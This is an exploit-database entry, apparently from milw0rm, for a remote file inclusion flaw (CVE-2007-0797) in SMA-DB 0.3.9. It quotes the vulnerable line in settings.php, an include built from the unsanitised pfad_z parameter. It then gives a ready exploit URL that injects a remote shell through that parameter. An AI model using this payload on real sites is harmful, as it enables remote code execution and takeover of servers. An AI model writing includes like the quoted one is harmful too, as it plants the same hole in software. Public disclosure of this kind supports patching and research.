SMA-DB 0.3.9 - 'settings.php' Remote File Inclusion
Author: ThE dE@Th
type: webapps
platform: php
port:
date_added: 2007-02-04
date_updated:
verified: 1
codes: OSVDB-33096;CVE-2007-0797
tags:
aliases:
screenshot_url:
application_url:
********************************************************************************
To ConTacT mE:wWw.Asb-May.net/bb
ScRiPt:-http://people.ee.ethz.ch/~dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
Settings.php:-
include_once($pfad_z."scripts/session.php");
********************************************************************************
ExPlOiT:-http://www.Site.com/theme/settings.php?pfad_z=[Shell]
********************************************************************************
# milw0rm.com [2007-02-05]